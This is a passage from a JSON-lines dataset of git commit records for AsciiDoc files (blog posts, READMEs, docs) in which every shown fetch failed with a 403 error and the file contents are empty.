(`n[\"key\"]``) to enable this. Additionally,\nthis CIP proposes to add a new function (`keys()`) for iterating\nthe keys of any map or entity.\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-02-17-dynamic-property-lookup.adoc","new_file":"cip\/CIP2015-02-17-dynamic-property-lookup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a681f0a44d07ef5feb27745012b320c3335a509","subject":"y2b create post The Best Mouse in the World?","message":"y2b create post The Best Mouse in the World?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-29-The-Best-Mouse-in-the-World.adoc","new_file":"_posts\/2015-04-29-The-Best-Mouse-in-the-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502bba18737b6d93627a315579f56884d69912bd","subject":"y2b create post This Gadget Reads Your Mind","message":"y2b create post This Gadget Reads Your Mind","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-19-This-Gadget-Reads-Your-Mind.adoc","new_file":"_posts\/2016-07-19-This-Gadget-Reads-Your-Mind.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8ca7effc511b75f578242287475fbb6de0ccc7f3","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"214860c193a4ae655ed82e7e965959f7a74386f8","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee1dc02eea8a159ae020e9fc3ae8e1b05ab6bb5e","subject":"Create do-code-of-conduct-fil.adoc","message":"Create do-code-of-conduct-fil.adoc\n\nFilipino translation for do-code-of-conduct.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-of-conduct-fil.adoc","new_file":"src\/do\/do-code-of-conduct-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de2e966981a5bc0b51233f079122f5dafc7f14a7","subject":"Update 2017-03-03-Test-Collab.adoc","message":"Update 2017-03-03-Test-Collab.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-03-03-Test-Collab.adoc","new_file":"_posts\/2017-03-03-Test-Collab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"221300cf811968a0eaeba4b044bafe3f11bcf39b","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2ca0d1708c8cf2655449fbee78c95878649f513","subject":"Update 10022015-Blog-Title.adoc","message":"Update 10022015-Blog-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/10022015-Blog-Title.adoc","new_file":"_posts\/10022015-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46529101f72f7828d45a10c285155f9ff671c5ec","subject":"Update 2017-02-25-Life-Lessons-From-Video-Games.adoc","message":"Update 2017-02-25-Life-Lessons-From-Video-Games.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-02-25-Life-Lessons-From-Video-Games.adoc","new_file":"_posts\/2017-02-25-Life-Lessons-From-Video-Games.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e56974e909f33d1d96552493a48e9b1c4606bb55","subject":"Create README.adoc","message":"Create README.adoc","repos":"OpenHFT\/Chronicle-Core","old_file":"src\/main\/java\/net\/openhft\/chronicle\/core\/jlbh\/README.adoc","new_file":"src\/main\/java\/net\/openhft\/chronicle\/core\/jlbh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aee0cbff331917043adc53df706d6de494c6925d","subject":"Improvements to domain objects","message":"Improvements to domain objects\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e351214636dbe168f419be5925fc67a482b6a66","subject":"add doc","message":"add doc\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78d1e56b40c7d5c8cb5b9e8d74a1959249eab0ed","subject":"Little fixes to the README","message":"Little fixes to the README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"b351585bad555a2b5bb5d4369c268dba4a434618","subject":"Some minor fixes in docs (#54)","message":"Some minor fixes in docs (#54)\n\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa043324cf848443dee961be50e67391f1fdff2","subject":"Update README","message":"Update 
README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"298e17eaa3886a24ad2587a5e2838a7a5cbd1844","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-c,Yubico\/yubico-c","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-c.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"14236965065e4d59ccb15164879f643da62d9cd1","subject":"Added readme","message":"Added readme\n","repos":"vert-x3\/vertx-amqp-service,vert-x3\/vertx-amqp-service,InfoSec812\/vertx-amqp-service,vert-x3\/vertx-amqp-service,InfoSec812\/vertx-amqp-service,InfoSec812\/vertx-amqp-service","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InfoSec812\/vertx-amqp-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9640f6966247648f103063aa48449e8aa7f3247f","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/php-yubico,Yubico\/php-yubico","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/php-yubico.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"39f01bb79b9cb9d391b3219633c81e7ef1682a48","subject":"Create README.adoc","message":"Create README.adoc","repos":"robertpanzer\/asciidoctor-test-webapp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robertpanzer\/asciidoctor-test-webapp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c72a33da52b08c266d508e220f3b13dc976eef53","subject":"document just the aws stuff","message":"document just the aws stuff\n","repos":"markllama\/aws-cli-thor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/aws-cli-thor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dce9c18e00519dc6469bb3f02394318b4e8861c1","subject":"Added Camel 2.20.0 release notes to docs","message":"Added Camel 2.20.0 release notes to 
docs\n","repos":"christophd\/camel,tadayosi\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,DariusX\/camel,kevinearls\/camel,jamesnetherton\/camel,DariusX\/camel,punkhorn\/camel-upstream,objectiser\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pax95\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,DariusX\/camel,onders86\/camel,jamesnetherton\/camel,adessaigne\/camel,adessaigne\/camel,kevinearls\/camel,punkhorn\/camel-upstream,cunningt\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,Fabryprog\/camel,Fabryprog\/camel,alvinkwekel\/camel,mcollovati\/camel,jamesnetherton\/camel,sverkera\/camel,ullgren\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,onders86\/camel,kevinearls\/camel,pax95\/camel,nikhilvibhav\/camel,ullgren\/camel,pax95\/camel,apache\/camel,apache\/camel,tdiesler\/camel,jamesnetherton\/camel,mcollovati\/camel,sverkera\/camel,Fabryprog\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,jamesnetherton\/camel,adessaigne\/camel,CodeSmell\/camel,kevinearls\/camel,zregvart\/camel,christophd\/camel,onders86\/camel,objectiser\/camel,gnodet\/camel,kevinearls\/camel,cunningt\/camel,CodeSmell\/camel,apache\/camel,nicolaferraro\/camel,jamesnetherton\/camel,tdiesler\/camel,Fabryprog\/camel,pmoerenhout\/camel,nicolaferraro\/camel,zregvart\/camel,christophd\/camel,pax95\/camel,sverkera\/camel,sverkera\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,christophd\/camel,onders86\/camel,sverkera\/camel,ullgren\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,ullgren\/camel,anoordover\/camel,zregvart\/camel,CodeSmell\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,davidkarlsen\/camel,cunningt\/camel,nicolaferraro\/camel,anoordover\/camel,anoordover\/camel,tdiesler\/camel,apache\/camel,kevinearls\/camel,anoordover\/camel,DariusX\/camel,tadayosi\/camel,davidkarlsen\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,anoordover\/camel,sverkera\/camel,objectiser\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,onders86\/camel,objectiser\/camel,adessaigne\/camel,davidkarlsen\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2200-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2200-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f2e52f90941948b078cec522624fadb5b8f5c6d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1ba17796f79b475f8ef7d99a8ee752f25179b2","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 
2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b91396a01a0a6db95c907c50cc901ff1e4a64d94","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b90818528f1964e42a9a1a27fad8b84516e2994","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de5537a6f6430ea797ef440d79940643169c1341","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e56e8c4a63f994ad748f271aef620be084d0cee2","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/16\/deref.adoc","new_file":"content\/news\/2021\/07\/16\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bc2d310c85c3a09c38b5c5f19da9292e2cdd0e41","subject":"Add note regarding dummy creation to docs in regards to #82","message":"Add note regarding dummy creation to docs in regards to #82\n","repos":"siordache\/spock,raphw\/spock,raphw\/spock,siordache\/spock,siordache\/spock,spockframework\/spock,raphw\/spock,leonard84\/spock","old_file":"docs\/interaction_based_testing.adoc","new_file":"docs\/interaction_based_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3df68eaf8c8074db231fc11a33c096c2994c2163","subject":"Create 
\t2014-07-03-forge-2.7.0.final.asciidoc","message":"Create \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"agoncal\/docs,addonis1990\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f763129874d1f421955f0d9e75944d4e6225eab4","subject":"Publish 2015-2-10-2014.adoc","message":"Publish 2015-2-10-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-2014.adoc","new_file":"2015-2-10-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1edfce64804041db28c5121ae9fa740ca452353","subject":"add atom setup instructions","message":"add atom setup instructions\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Atom_first_steps.adoc","new_file":"Atom_first_steps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"fc1c3a07ac1a74448947d23672745b80a75862ff","subject":"y2b create post G-Shock Smartwatch Unboxing! (GB-X6900B) [4K]","message":"y2b create post G-Shock Smartwatch Unboxing! 
(GB-X6900B) [4K]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-17-GShock-Smartwatch-Unboxing-GBX6900B-4K.adoc","new_file":"_posts\/2014-02-17-GShock-Smartwatch-Unboxing-GBX6900B-4K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c5b3854417bd802b92f7e09abc2450ddd64b82","subject":"Update 2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81b37e64018a48d297ee24789e60f279df840fdb","subject":"iterm: Add an `installation` section to the readme","message":"iterm: Add an `installation` section to the readme\n\nThere are two intricacies one has to keep in mind when installing the\niTerm2 configuration by hand: telling iTerm2 to load the configuration\nfrom a custom path and where the custom path actually is.\n\nLuckily this can be done using `defaults write` and thus is explained\nrather easily.\n","repos":"PigeonF\/.dotfiles","old_file":"iterm2\/README.adoc","new_file":"iterm2\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9b1a75d655d72ae31da5a5af6e3642b4cf42bbb","subject":"Update 2016-03-11-windowslinux.adoc","message":"Update 2016-03-11-windowslinux.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-11-windowslinux.adoc","new_file":"_posts\/2016-03-11-windowslinux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1dc764017ef577af0f1499a771799e44740f24b","subject":"Update 2017-05-01-Dquad-Obsession-V2-Review.adoc","message":"Update 2017-05-01-Dquad-Obsession-V2-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-05-01-Dquad-Obsession-V2-Review.adoc","new_file":"_posts\/2017-05-01-Dquad-Obsession-V2-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c688b722d00a351e9ab4965ab15170ca97702732","subject":"y2b create post Samsung Galaxy Nexus Unboxing","message":"y2b create post Samsung Galaxy Nexus 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-06-Samsung-Galaxy-Nexus-Unboxing.adoc","new_file":"_posts\/2011-12-06-Samsung-Galaxy-Nexus-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857264633d10afd9484f803589267ba21f410d79","subject":"Removed online instance usage","message":"Removed online instance usage","repos":"tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/14\/intro-to-hawkular.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/14\/intro-to-hawkular.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f647e0a94582e9ad46571cb07f9a522acd914bd3","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"163829908dfc1888c423f126554507b52675c65f","subject":"Changed instructions for copying the rabbitmq config file","message":"Changed instructions for copying the rabbitmq config file\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/Third-Party 
Libraries\/RabbitMQ\/RabbitMQ.adoc","new_file":"Development-Guide\/Third-Party Libraries\/RabbitMQ\/RabbitMQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"86087d39157d93f3e8b6c44bf9cb1485e6954135","subject":"y2b create post How To Spot A Fake iPhone","message":"y2b create post How To Spot A Fake iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-13-How-To-Spot-A-Fake-iPhone.adoc","new_file":"_posts\/2016-08-13-How-To-Spot-A-Fake-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e20d25e5241f63d8e66ca934b55624778e6a234","subject":"Update 2017-01-16-Music-for-the-Programming.adoc","message":"Update 2017-01-16-Music-for-the-Programming.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-01-16-Music-for-the-Programming.adoc","new_file":"_posts\/2017-01-16-Music-for-the-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ece7f7e19ba196e9a753c9c15b62fb2b93ad92","subject":"[DOC] Fix typo in the documentation","message":"[DOC] Fix typo in the documentation\n\nrelates 